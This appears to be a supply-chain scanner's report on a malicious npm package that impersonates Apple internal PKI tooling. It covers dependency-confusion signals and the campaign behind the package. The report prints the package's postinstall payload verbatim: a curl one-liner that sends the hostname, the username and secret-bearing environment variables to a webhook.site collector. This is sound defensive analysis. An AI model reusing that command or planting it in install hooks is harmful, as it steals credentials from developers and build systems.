apple-internal-pki-utils @1.0.1
Risk Dispositions (2 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason |
|---|---|---|---|---|
| install-script:postinstall | install-scripts | reject | AI | AI (install-scripts): Postinstall is a credential-stealing exfiltration payload; generalizes to all versions of this package. |
| bogus-package | bogus-package | reject | AI | AI (bogus-package): Package is a malicious throwaway impersonating Apple internal tooling; generalizes to all versions. |
SAST Findings (4)
[Always reject] Script: `D=$(hostname; whoami; printenv | grep -E 'APPLE|AWS|GIT|SECRET'); curl -G --data-urlencode "log=$D" https://webhook.site/9a376595-d347-4110-ac32-814e6e2f0754`
[Always reject] Matched 6 signal(s), weighted score 8:
• [S_PUBLISHER_MASS_PRODUCTION] Maintainer 'raya4321' owns 20 packages, ≥70% share a templated name shape.
• [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL; genuine packages almost always link somewhere.
• [S_NO_KEYWORDS] No keywords declared.
• [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared.
• [S_TINY_PAYLOAD] Tiny payload: 1 code file(s), 430 bytes total.
• [S_INFLATED_FIRST_SEMVER] First publish at version 1.0.1; inflated semver on a brand-new package.
Malicious npm package published by threat actor "raya4321" as part of a coordinated name-impersonation campaign targeting Apple internal infrastructure services (authentication, PKI, telemetry, CloudKit, and cloud infrastructure). The names mimic plausible internal packages rather than misspelling public ones, so the lure is dependency confusion rather than classic typosquatting. All packages in this campaign execute credential-theft payloads during npm installation via preinstall or postinstall lifecycle hooks. Trigger: postinstall. In this version the postinstall script collects the hostname, the current user, and every environment variable matching APPLE, AWS, GIT, or SECRET, then sends the result URL-encoded as a GET query parameter to a fixed webhook.site URL. The campaign write-up also describes a variant that base64-encodes the same data and posts it to a requestcatcher.com endpoint whose host is built from the $CATCHER_NAME environment variable (/apple_leak path); that variant does not match the script recovered from this version, so treat the two as different collector configurations of the same payload. Any CI runner or developer machine that installed this package should have its AWS, Git, and Apple-related credentials rotated.
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so its absence is common and not a signal on its own, but it means the publish cannot be tied to a source repository or a build.
Review Summary
Risk score: 100 (capped from 123). Findings: 3 critical (+120), 1 low (+3).
Published to npm: